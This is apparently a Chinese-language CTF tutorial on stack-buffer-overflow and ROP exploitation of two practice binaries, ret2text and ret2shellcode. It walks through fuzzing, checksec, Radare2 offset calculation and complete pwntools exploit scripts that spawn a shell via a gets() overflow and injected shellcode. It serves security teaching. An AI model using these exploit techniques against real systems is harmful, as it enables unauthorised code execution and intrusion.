预备条件

ret2shellcode：http://www.hacksprit.top:8090/files/ret2shellcode

ret2text: http://www.hacksprit.top:8090/files/ret2text

关闭系统的ASLR

栈溢出

在这里对栈溢出进行了介绍。

ROP

学习过Java的人对*OP应该都有所了解，比如OOP(面向对象编程)，比如AOP(面向切面编程)。那ROP是 什么那？又和栈攻击有什么关系那？

ROP(Return Oriented Programming)，其主要思想是在栈缓冲区溢出的基础上，利用程序中已有的小片段( gadgets )来改变某些寄存器或者变量的值，从而控制程序的执行流程。所谓gadgets 就是以 ret 结尾的指令序列，通过这些指令序列，我们可以修改某些地址的内容，方便控制程序的执行流程，从而绕过NX保护机制。

之所以称之为 ROP，是因为核心在于利用了指令集中的 ret 指令，改变了指令流的执行顺序。ROP 攻击一般得满足如下条件：

• 程序存在溢出，并且可以控制返回地址。
• 可以找到满足条件的 gadgets 以及相应 gadgets 的地址

ret2text程序

攻击目标

ret2text程序

简单fuzz

通过输入多个字符a进行fuzz，从下图中可以看出程序崩溃。由此推测程序存在漏洞。

查看保护机制

使用 checksec ret2text 查看程序使用的保护机制，从图中可以看出NX是开启的，也就是无法直接执行栈里面的数据。

调试程序

使用Radare2(或者gdb)进行调试，本文使用Radare2进行调试。关于Radare2的介绍，可参考这里。

查看汇编代码

使用 pdf@main

通过汇编代码，大致可以写出相应的c代码，居然有一个高度危险的函数gets。由于gets函数不会对输入长度进行校验，那么当长度足够长的时候，就会覆盖到返回地址，然后，当程序返回之后，返回到一个无效的地址，由此就有了上面的程序崩溃。具体可参考这里。

int main(){    char *s;    setbuf(stdout,0,2,0)    setbuf(stdin,0,1,1)    puts("There is something amazing here, do you know anything?")    gets(s);    printf("Maybe I will tell you next time !")    return 0;}

确定与返回地址的偏移

在gets函数之后下断点, 运行程序。

通过 v 查看栈、寄存器等信息

s与ebp的偏移0xffffcfc8 - 0xffffcf5c = 6ch = 6*16+12 = 108，再加上ebp的4个字节就是距离返回地址的偏移，也就是112。然后在返回地址处，填充一个地址，这个地址，指向获取系统shell的代码。，这就是ROP。

    High    Address |                 |            +-----------------+            | args            |            +-----------------+            | return address  |            +-----------------+         ebp | old ebp         |            +-----------------+            |   ...           |            +-----------------+     ebp-112| 变量s地址      |    Low     |                 |    Address

寻找获取系统shell的代码

通过 pdf@sym.secure 查看汇编代码 ，可以看出有system("/bin/sh")这段代码，于是可以这里的代码。

获取shell

##!/usr/bin/env pythonfrom pwn import *sh = process('./ret2text')target = 0x804863ash.sendline('A' * (0x6c+4) + p32(target))sh.interactive()

运行，结果如下，通过这个shell可以查看进程，用户等信息。

ret2shellcode

攻击目标

ret2shellcode程序

简单fuzz

查看保护机制

NX未开启

调试程序

通过分析程序，写出c代码，很明显，依然存在由gets函数引起的栈溢出漏洞。但是多了strncpy内存复制函数，那么如果buf2中的内存是可执行的，写入一段shellcode，然后再跳转到buf2出，就可以控制程序的执行了，同样这也是ROP。

int main(){    char *s;    setbuf(stdout,0,2,0)    setbuf(stdin,0,1,1)    puts("No system for you this time !!!")    gets(s);    strncpy(buf2,s,0x64)    printf("bye bye ~")    return 0;}

buf2处的内存能否执行，通过 dm查看Memory Map的权限，由于0x804a080在第二行的范围内，因此具有可执行的权限。

确定与返回地址的偏移

和上面的方法类似。

获取shell

python ljust

Python ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。如果指定的长度小于原字符串的长度则返回原字符串

#!/usr/bin/pythonstr = "this is string example....wow!!!";print str.ljust(50, '0');

运行结果，总长度是50，不是填充的字符长度是50。

this is string example....wow!!!000000000000000000

shellcode

使用的模块

• asm : 汇编与反汇编，支持x86/x64/arm/mips/powerpc等基本上所有的主流平台
• shellcraft : shellcode的生成器

获取shell的payload

结合asm可以可以得到最终的pyaload。

from pwn import *context(os='linux',arch='amd64')shellcode = asm(shellcraft.sh())

或者

from pwn import *shellcode = asm(shellcraft.amd64.linux.sh())

除了直接执行sh之外，还可以进行其它的一些常用操作例如提权、反向连接等等。

exploit

#!/usr/bin/env pythonfrom pwn import *sh = process('./ret2shellcode')shellcode = asm(shellcraft.sh())buf2_addr = 0x804a080x = len(shellcode.ljust(112, 'A'))sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))sh.interactive()

运行程序，成功获取shell，可以查看进程等信息。

公众号

更多二进制安全内容，欢迎关注我的公众号:无情剑客。